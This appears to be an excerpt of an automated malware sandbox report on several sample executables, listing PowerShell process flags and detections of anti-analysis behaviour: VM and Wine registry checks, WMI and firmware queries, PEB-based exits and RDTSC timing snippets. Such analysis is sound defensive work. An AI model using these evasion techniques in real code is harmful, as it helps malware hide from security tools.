                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                      Malware Analysis System Evasion

                                      barindex
                                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                      Query firmware table information (likely to detect VMs)
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSystem information queried: FirmwareTableInformationJump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeSystem information queried: FirmwareTableInformation
                                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Tries to detect virtualization through RDTSC time measurements
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: A18FE9 second address: A18FEE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B917BA second address: B917C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B917C3 second address: B917D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnl 00007FD668F2A766h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B90C5A second address: B90C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B90D8C second address: B90DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A770h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B90DA0 second address: B90DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B91069 second address: B9106F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B94139 second address: B94164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1CC3h], ecx 0x0000000f push 00000000h 0x00000011 stc 0x00000012 push 1D3C1480h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD668F2A642h 0x0000001e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B94164 second address: B941DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1D3C1400h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD668F2A768h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1F06h], edi 0x00000030 push 00000003h 0x00000032 mov cx, 8041h 0x00000036 pushad 0x00000037 mov ecx, edi 0x00000039 movzx edi, si 0x0000003c popad 0x0000003d push 00000000h 0x0000003f jns 00007FD668F2A76Bh 0x00000045 push 00000003h 0x00000047 or dword ptr [ebp+122D1F74h], edx 0x0000004d push 960E14D9h 0x00000052 push edi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FD668F2A76Fh 0x0000005a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B941DF second address: B941E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B9425A second address: B94261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B94261 second address: B94305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2258h], esi 0x00000010 push 00000000h 0x00000012 add esi, 5A008FA0h 0x00000018 push 497DB4C4h 0x0000001d pushad 0x0000001e push ebx 0x0000001f jp 00007FD668F2A636h 0x00000025 pop ebx 0x00000026 pushad 0x00000027 jmp 00007FD668F2A647h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 xor dword ptr [esp], 497DB444h 0x00000037 mov edx, dword ptr [ebp+122D2016h] 0x0000003d push 00000003h 0x0000003f call 00007FD668F2A63Eh 0x00000044 jmp 00007FD668F2A63Eh 0x00000049 pop edi 0x0000004a push 00000000h 0x0000004c mov ecx, edx 0x0000004e push 00000003h 0x00000050 jl 00007FD668F2A642h 0x00000056 jno 00007FD668F2A63Ch 0x0000005c push 65AFE3CCh 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 jmp 00007FD668F2A645h 0x00000069 pop eax 0x0000006a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B94305 second address: B9430F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B9430F second address: B9434D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5A501C34h 0x0000000f jns 00007FD668F2A63Ch 0x00000015 mov dword ptr [ebp+122D1F06h], edi 0x0000001b lea ebx, dword ptr [ebp+1244EE13h] 0x00000021 sub dword ptr [ebp+122D17EEh], ebx 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d jmp 00007FD668F2A640h 0x00000032 popad 0x00000033 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B9434D second address: B94353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B94353 second address: B94357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB3635 second address: BB3641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD668F2A766h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB3641 second address: BB3645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB37C2 second address: BB37DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD668F2A766h 0x0000000a jmp 00007FD668F2A772h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB43F4 second address: BB4400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD668F2A636h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B88EBD second address: B88EF6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD668F2A777h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FD668F2A77Ch 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B88EF6 second address: B88EFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4B32 second address: BB4B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4B3C second address: BB4B5E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD668F2A636h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD668F2A646h 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4B5E second address: BB4B65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4CCB second address: BB4CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4F5A second address: BB4F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A776h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4F79 second address: BB4F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A641h 0x00000007 je 00007FD668F2A636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4F94 second address: BB4FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A779h 0x00000008 jmp 00007FD668F2A773h 0x0000000d popad 0x0000000e pushad 0x0000000f jg 00007FD668F2A766h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB4FD1 second address: BB4FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FD668F2A638h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B83DFC second address: B83E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB9A50 second address: BB9A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD668F2A641h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB9A7E second address: BB9A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BB9A84 second address: BB9A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B78161 second address: B78166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B78166 second address: B781CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FD668F2A64Eh 0x00000011 pushad 0x00000012 jmp 00007FD668F2A643h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FD668F2A645h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BBDAF6 second address: BBDB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Bh 0x00000009 jng 00007FD668F2A766h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BBDB0D second address: BBDB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
